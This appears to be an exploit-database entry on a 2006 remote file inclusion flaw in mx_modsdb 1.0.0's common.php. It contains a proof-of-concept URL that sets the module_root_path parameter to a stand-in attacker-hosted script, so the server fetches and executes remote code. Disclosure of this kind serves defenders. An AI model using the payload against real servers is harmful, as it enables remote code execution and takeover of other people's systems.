header-logo
Suggest Exploit
vendor:
mx_modsdb
by:
Lu7k
N/A
CVSS
N/A
Remote Inclusion Vulnerability
N/A
CWE
Product Name: mx_modsdb
Affected Version From: 1.0.0
Affected Version To: 1.0.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

mx_modsdb v.1.0.0 (common.php) Remote Inclusion Vulnerability

A remote inclusion vulnerability exists in mx_modsdb v.1.0.0 due to insufficient sanitization of user-supplied input to the 'module_root_path' parameter in 'common.php'. An attacker can exploit this vulnerability to execute arbitrary remote code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the execution of arbitrary code.
Source

Exploit-DB raw data:

mx_modsdb v.1.0.0 (common.php) Remote Inclusion Vulnerability


**************************************************************
Critical Level : Dangerous
**************************************************************
Script Download: http://forums.phpmix.org/download.php?id=26
**************************************************************
Bugfounder: Lu7k
**************************************************************
Contact Me : www.school-of-hack.de or lu7k@mail.nu
**************************************************************

-----------------------------------------------------------------------------

Code:http://[target]/[patH]/includes/common.php?module_root_path=http://Ev!LScr!pt.txt

-----------------------------------------------------------------------------

*************************************************************
Greetings: Bdrok - TheJT - MyMaster - str0ke - 404-crew.de.vu
*************************************************************

# milw0rm.com [2006-12-12]